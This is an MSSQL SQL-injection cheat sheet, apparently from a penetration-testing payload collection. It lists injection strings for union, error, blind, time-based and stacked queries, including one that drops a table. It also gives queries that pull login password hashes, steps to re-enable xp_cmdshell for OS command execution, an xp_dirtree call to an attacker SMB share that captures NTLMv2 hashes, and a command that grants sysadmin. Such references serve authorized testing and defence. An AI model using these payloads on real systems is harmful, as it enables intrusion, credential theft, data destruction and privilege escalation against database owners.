MSSQL Injection

Summary

MSSQL comments

  1. -- comment goes here
  2. /* comment goes here */

MSSQL version

  1. SELECT @@version

MSSQL database name

  1. SELECT DB_NAME()

MSSQL List databases

  1. SELECT name FROM master..sysdatabases;
  2. SELECT DB_NAME(N); for N = 0, 1, 2,

MSSQL List columns

  1. SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = mytable’); for the current DB only
  2. SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; list colum names and types for master..sometable
  3. SELECT table_catalog, column_name FROM information_schema.columns

MSSQL List tables

  1. SELECT name FROM master..sysobjects WHERE xtype = U’; use xtype = V for views
  2. SELECT name FROM someotherdb..sysobjects WHERE xtype = U’;
  3. SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; list colum names and types for master..sometable
  4. SELECT table_catalog, table_name FROM information_schema.columns

MSSQL Extract user/password

  1. MSSQL 2000:
  2. SELECT name, password FROM master..sysxlogins
  3. SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
  4. MSSQL 2005
  5. SELECT name, password_hash FROM master.sys.sql_logins
  6. SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins

MSSQL Union Based

  1. -- extract databases names
  2. $ SELECT name FROM master..sysdatabases
  3. [*] Injection
  4. [*] msdb
  5. [*] tempdb
  6. -- extract tables from Injection database
  7. $ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
  8. [*] Profiles
  9. [*] Roles
  10. [*] Users
  11. -- extract columns for the table Users
  12. $ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
  13. [*] UserId
  14. [*] UserName
  15. -- Finally extract the data
  16. $ SELECT UserId, UserName from Users

MSSQL Error based

  1. For integer inputs : convert(int,@@version)
  2. For integer inputs : cast((SELECT @@version) as int)
  3. For string inputs : ' + convert(int,@@version) + '
  4. For string inputs : ' + cast((SELECT @@version) as int) + '

MSSQL Blind based

  1. SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
  2. WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
  3. SELECT message FROM data WHERE row = 1 and message like 't%'

MSSQL Time based

  1. ProductID=1;waitfor delay '0:0:10'--
  2. ProductID=1);waitfor delay '0:0:10'--
  3. ProductID=1';waitfor delay '0:0:10'--
  4. ProductID=1');waitfor delay '0:0:10'--
  5. ProductID=1));waitfor delay '0:0:10'--
  6. IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --

MSSQL Stacked Query

Use a semi-colon “;” to add another query

  1. ProductID=1; DROP members--

MSSQL Command execution

  1. EXEC xp_cmdshell "net user";
  2. EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
  3. EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';

If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)

  1. EXEC sp_configure 'show advanced options',1;
  2. RECONFIGURE;
  3. EXEC sp_configure 'xp_cmdshell',1;
  4. RECONFIGURE;

To interact with the MSSQL instance.

  1. sqsh -S 192.168.1.X -U sa -P superPassword
  2. python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758

MSSQL UNC Path

MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the xp_dirtree function to list the files in our SMB share and grab the NTLMv2 hash.

  1. 1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--

MSSQL Make user DBA (DB admin)

  1. EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;

References